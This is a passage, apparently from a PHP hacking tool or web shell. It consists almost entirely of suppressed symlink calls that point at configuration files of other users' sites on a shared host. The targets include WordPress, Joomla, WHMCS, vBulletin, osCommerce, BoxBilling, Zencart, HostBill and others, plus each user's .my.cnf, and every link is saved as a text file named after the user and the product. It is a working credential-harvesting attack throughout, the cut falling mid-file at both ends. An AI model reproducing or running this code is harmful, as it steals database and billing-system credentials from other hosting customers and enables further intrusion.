  1987. @symlink('/home6/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1988. @symlink('/home6/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1989. @symlink('/home6/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1990. @symlink('/home6/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1991. @symlink('/home6/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1992. @symlink('/home6/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1993. @symlink('/home6/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1994. @symlink('/home6/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1995. @symlink('/home6/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1996. @symlink('/home6/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1997. @symlink('/home6/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1998. @symlink('/home6/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1999. @symlink('/home6/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2000. @symlink('/home6/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2001. @symlink('/home6/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2002. @symlink('/home6/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2003. @symlink('/home6/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2004. @symlink('/home6/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2005. @symlink('/home6/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2006. @symlink('/home6/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2007. @symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2008. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2009. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2010. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2011. @symlink('/home6/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2012. @symlink('/home6/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2013. @symlink('/home6/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2014. @symlink('/home6/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2015. @symlink('/home6/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2016. @symlink('/home6/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2017. @symlink('/home6/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2018. @symlink('/home6/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2019. @symlink('/home6/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2020. @symlink('/home6/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2021. @symlink('/home6/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2022. @symlink('/home6/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2023. @symlink('/home6/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2024. @symlink('/home6/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2025. @symlink('/home6/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2026. @symlink('/home6/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2027. @symlink('/home6/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2028. @symlink('/home6/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2029. @symlink('/home6/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2030. @symlink('/home6/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2031. @symlink('/home6/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2032. @symlink('/home6/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2033. @symlink('/home6/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2034. @symlink('/home6/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2035. @symlink('/home6/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2036. @symlink('/home6/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2037. @symlink('/home6/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2038. @symlink('/home6/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2039. @symlink('/home6/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2040. @symlink('/home6/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2041. @symlink('/home6/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2042. @symlink('/home6/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2043. @symlink('/home6/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2044. @symlink('/home6/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2045. @symlink('/home6/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2046. @symlink('/home6/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2047. @symlink('/home6/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2048. @symlink('/home6/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2049. @symlink('/home6/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2050. @symlink('/home6/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2051. @symlink('/home6/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2052. @symlink('/home6/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2053. @symlink('/home6/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2054. @symlink('/home6/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2055. @symlink('/home6/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2056. @symlink('/home6/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2057. @symlink('/home6/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2058. @symlink('/home6/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2059. @symlink('/home6/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2060. @symlink('/home6/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2061. @symlink('/home6/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2062. @symlink('/home6/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2063. @symlink('/home6/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2064.  
  2065. //home 7
  2066.  
  2067. @symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2068. @symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2069. @symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2070. @symlink('/home7/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2071. @symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2072. @symlink('/home7/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2073. @symlink('/home7/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2074. @symlink('/home7/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2075. @symlink('/home7/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2076. @symlink('/home7/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2077. @symlink('/home7/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2078. @symlink('/home7/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2079. @symlink('/home7/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2080. @symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2081. @symlink('/home7/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2082. @symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2083. @symlink('/home7/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2084. @symlink('/home7/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2085. @symlink('/home7/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2086. @symlink('/home7/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2087. @symlink('/home7/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2088. @symlink('/home7/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2089. @symlink('/home7/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2090. @symlink('/home7/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2091. @symlink('/home7/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2092. @symlink('/home7/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2093. @symlink('/home7/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2094. @symlink('/home7/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2095. @symlink('/home7/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2096. @symlink('/home7/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2097. @symlink('/home7/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2098. @symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2099. @symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2100. @symlink('/home7/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2101. @symlink('/home7/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2102. @symlink('/home7/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2103. @symlink('/home7/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2104. @symlink('/home7/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2105. @symlink('/home7/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2106. @symlink('/home7/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2107. @symlink('/home7/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2108. @symlink('/home7/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2109. @symlink('/home7/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2110. @symlink('/home7/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2111. @symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2112. @symlink('/home7/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2113. @symlink('/home7/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home7/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home7/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home7/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home7/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home7/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home7/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home7/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home7/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2126. @symlink('/home7/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2127. @symlink('/home7/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2128. @symlink('/home7/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2129. @symlink('/home7/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2130. @symlink('/home7/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2131. @symlink('/home7/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2132. @symlink('/home7/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2133. @symlink('/home7/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2134. @symlink('/home7/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2135. @symlink('/home7/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2136. @symlink('/home7/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2137. @symlink('/home7/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2138. @symlink('/home7/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2139. @symlink('/home7/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2140. @symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2141. @symlink('/home7/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2142. @symlink('/home7/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2143. @symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2144. @symlink('/home7/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2145. @symlink('/home7/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2146. @symlink('/home7/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2147. @symlink('/home7/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2148. @symlink('/home7/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2149. @symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2150. @symlink('/home7/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2151. @symlink('/home7/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2152. @symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2153. @symlink('/home7/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2154. @symlink('/home7/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2155. @symlink('/home7/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2156. @symlink('/home7/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2157. @symlink('/home7/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2158. @symlink('/home7/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2159. @symlink('/home7/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2160. @symlink('/home7/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2161. @symlink('/home7/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2162. @symlink('/home7/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2163. @symlink('/home7/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2164. @symlink('/home7/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2165. @symlink('/home7/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2166. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2167. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2168. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2169. @symlink('/home7/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2170. @symlink('/home7/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2171. @symlink('/home7/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2172. @symlink('/home7/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2173. @symlink('/home7/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2174. @symlink('/home7/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2175. @symlink('/home7/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2176. @symlink('/home7/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2177. @symlink('/home7/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2178. @symlink('/home7/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2179. @symlink('/home7/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2180. @symlink('/home7/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2181. @symlink('/home7/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2182. @symlink('/home7/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2183. @symlink('/home7/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2184. @symlink('/home7/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2185. @symlink('/home7/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2186. @symlink('/home7/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2187. @symlink('/home7/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2188. @symlink('/home7/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2189. @symlink('/home7/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2190. @symlink('/home7/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2191. @symlink('/home7/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2192. @symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2193. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2194. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2195. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2196. @symlink('/home7/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2197. @symlink('/home7/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2198. @symlink('/home7/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2199. @symlink('/home7/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2200. @symlink('/home7/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2201. @symlink('/home7/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2202. @symlink('/home7/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2203. @symlink('/home7/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2204. @symlink('/home7/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2205. @symlink('/home7/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2206. @symlink('/home7/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2207. @symlink('/home7/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2208. @symlink('/home7/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2209. @symlink('/home7/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2210. @symlink('/home7/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2211. @symlink('/home7/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2212. @symlink('/home7/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2213. @symlink('/home7/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2214. @symlink('/home7/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2215. @symlink('/home7/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2216. @symlink('/home7/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2217. @symlink('/home7/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2218. @symlink('/home7/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2219. @symlink('/home7/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2220. @symlink('/home7/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2221. @symlink('/home7/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2222. @symlink('/home7/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2223. @symlink('/home7/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2224. @symlink('/home7/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2225. @symlink('/home7/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2226. @symlink('/home7/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2227. @symlink('/home7/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2228. @symlink('/home7/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2229. @symlink('/home7/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2230. @symlink('/home7/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2231. @symlink('/home7/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2232. @symlink('/home7/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2233. @symlink('/home7/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2234. @symlink('/home7/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2235. @symlink('/home7/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2236. @symlink('/home7/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2237. @symlink('/home7/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2238. @symlink('/home7/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2239. @symlink('/home7/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2240. @symlink('/home7/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2241. @symlink('/home7/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2242. @symlink('/home7/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2243. @symlink('/home7/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2244. @symlink('/home7/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2245. @symlink('/home7/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2246. @symlink('/home7/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2247. @symlink('/home7/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2248. @symlink('/home7/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2249.  
  2250. //home 8
  2251.  
  2252. @symlink('/home8/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2253. @symlink('/home8/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2254. @symlink('/home8/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2255. @symlink('/home8/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2256. @symlink('/home8/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2257. @symlink('/home8/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2258. @symlink('/home8/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2259. @symlink('/home8/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2260. @symlink('/home8/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2261. @symlink('/home8/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2262. @symlink('/home8/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2263. @symlink('/home8/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2264. @symlink('/home8/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2265. @symlink('/home8/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2266. @symlink('/home8/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2267. @symlink('/home8/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2268. @symlink('/home8/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2269. @symlink('/home8/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2270. @symlink('/home8/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2271. @symlink('/home8/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2272. @symlink('/home8/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2273. @symlink('/home8/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2274. @symlink('/home8/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2275. @symlink('/home8/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2276. @symlink('/home8/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2277. @symlink('/home8/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2278. @symlink('/home8/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2279. @symlink('/home8/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2280. @symlink('/home8/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2281. @symlink('/home8/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2282. @symlink('/home8/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2283. @symlink('/home8/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2284. @symlink('/home8/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2285. @symlink('/home8/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2286. @symlink('/home8/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2287. @symlink('/home8/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2288. @symlink('/home8/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2289. @symlink('/home8/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2290. @symlink('/home8/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2291. @symlink('/home8/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2292. @symlink('/home8/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2293. @symlink('/home8/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2294. @symlink('/home8/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
